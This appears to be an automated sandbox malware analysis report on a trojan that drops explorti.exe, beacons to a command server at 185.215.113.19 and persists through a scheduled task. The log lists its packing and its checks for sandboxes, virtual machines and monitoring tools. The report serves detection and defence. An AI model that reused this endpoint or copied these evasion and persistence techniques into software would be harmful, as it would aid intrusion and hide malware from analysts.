Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 185.215.113.19 185.215.113.19

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 7_2_0071BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,

7_2_0071BD60

Source: unknown

HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: explorti.exe, 00000007.00000002.2891529475.00000000011BB000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000007.00000002.2891529475.00000000011FA000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000007.00000002.2891529475.000000000122A000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000007.00000002.2891529475.0000000001238000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php
Source: explorti.exe, 00000007.00000002.2891529475.000000000122A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php#
Source: explorti.exe, 00000007.00000002.2891529475.00000000011BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php#f
Source: explorti.exe, 00000007.00000002.2891529475.00000000011BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php0x
Source: explorti.exe, 00000007.00000002.2891529475.00000000011FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php3M
Source: explorti.exe, 00000007.00000002.2891529475.00000000011BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpC:
Source: explorti.exe, 00000007.00000002.2891529475.00000000011BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpPy;
Source: explorti.exe, 00000007.00000002.2891529475.00000000011BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpWindows
Source: explorti.exe, 00000007.00000002.2891529475.00000000011BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpeb8a7
Source: explorti.exe, 00000007.00000002.2891529475.000000000122A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpk
Source: explorti.exe, 00000007.00000002.2891529475.00000000011BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpm32
Source: explorti.exe, 00000007.00000002.2891529475.00000000011FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpmM
Source: explorti.exe, 00000007.00000002.2891529475.00000000011BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpoft
Source: explorti.exe, 00000007.00000002.2891529475.00000000011BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpon
Source: explorti.exe, 00000007.00000002.2891529475.00000000011FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpuM
Source: explorti.exe, 00000007.00000002.2891529475.00000000011BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpx
Source: explorti.exe, 00000007.00000002.2891529475.00000000011FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpyM

System Summary

PE file contains section with special chars

Source: f3wrBtIYXx.exe	Static PE information: section name:
Source: f3wrBtIYXx.exe	Static PE information: section name: .idata
Source: f3wrBtIYXx.exe	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: .idata
Source: explorti.exe.0.dr	Static PE information: section name:

Creates files inside the system directory

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe

File created: C:\Windows\Tasks\explorti.job

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00753068	7_2_00753068
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_0071E440	7_2_0071E440
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00714CF0	7_2_00714CF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00747D83	7_2_00747D83
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_0075765B	7_2_0075765B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00714AF0	7_2_00714AF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_0075777B	7_2_0075777B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00758720	7_2_00758720
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00756F09	7_2_00756F09
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00752BD0	7_2_00752BD0

Source: f3wrBtIYXx.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: f3wrBtIYXx.exe	Static PE information: Section: ZLIB complexity 1.0
Source: f3wrBtIYXx.exe	Static PE information: Section: bzkmssua ZLIB complexity 0.9941347082323538
Source: explorti.exe.0.dr	Static PE information: Section: ZLIB complexity 1.0
Source: explorti.exe.0.dr	Static PE information: Section: bzkmssua ZLIB complexity 0.9941347082323538

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/3@0/1

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe

File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: f3wrBtIYXx.exe

Virustotal: Detection: 54%

Source: f3wrBtIYXx.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe

File read: C:\Users\user\Desktop\f3wrBtIYXx.exe

Source: unknown	Process created: C:\Users\user\Desktop\f3wrBtIYXx.exe "C:\Users\user\Desktop\f3wrBtIYXx.exe"
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"	Jump to behavior

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Detected unpacking (changes PE section rights)

Source: f3wrBtIYXx.exe

Static file information: File size 1892864 > 1048576

Source: f3wrBtIYXx.exe

Static PE information: Raw size of bzkmssua is bigger than: 0x100000 < 0x19ca00

Data Obfuscation

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Unpacked PE file: 0.2.f3wrBtIYXx.exe.6d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bzkmssua:EW;sxdezqxh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bzkmssua:EW;sxdezqxh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 1.2.explorti.exe.710000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bzkmssua:EW;sxdezqxh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bzkmssua:EW;sxdezqxh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 2.2.explorti.exe.710000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bzkmssua:EW;sxdezqxh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bzkmssua:EW;sxdezqxh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 7.2.explorti.exe.710000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bzkmssua:EW;sxdezqxh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bzkmssua:EW;sxdezqxh:EW;.taggant:EW;

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: explorti.exe.0.dr	Static PE information: real checksum: 0x1d3758 should be: 0x1d0178
Source: f3wrBtIYXx.exe	Static PE information: real checksum: 0x1d3758 should be: 0x1d0178

PE file contains sections with non-standard names

Source: f3wrBtIYXx.exe	Static PE information: section name:
Source: f3wrBtIYXx.exe	Static PE information: section name: .idata
Source: f3wrBtIYXx.exe	Static PE information: section name:
Source: f3wrBtIYXx.exe	Static PE information: section name: bzkmssua
Source: f3wrBtIYXx.exe	Static PE information: section name: sxdezqxh
Source: f3wrBtIYXx.exe	Static PE information: section name: .taggant
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: .idata
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: bzkmssua
Source: explorti.exe.0.dr	Static PE information: section name: sxdezqxh
Source: explorti.exe.0.dr	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 7_2_0072D84C push ecx; ret

7_2_0072D85F

Source: f3wrBtIYXx.exe	Static PE information: section name: entropy: 7.988249586345587
Source: f3wrBtIYXx.exe	Static PE information: section name: bzkmssua entropy: 7.9539160203429615
Source: explorti.exe.0.dr	Static PE information: section name: entropy: 7.988249586345587
Source: explorti.exe.0.dr	Static PE information: section name: bzkmssua entropy: 7.9539160203429615

Drops PE files

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe

File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Regmonclass	Jump to behavior

Creates job files (autostart)

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe

File created: C:\Windows\Tasks\explorti.job

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe

Process information set: NOOPENFILEERRORBOX

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 73F280 second address: 73F284 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 73EAD1 second address: 73EADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B64C8 second address: 8B64CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B661B second address: 8B6633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5F64D1DF1Eh 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B6633 second address: 8B6638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
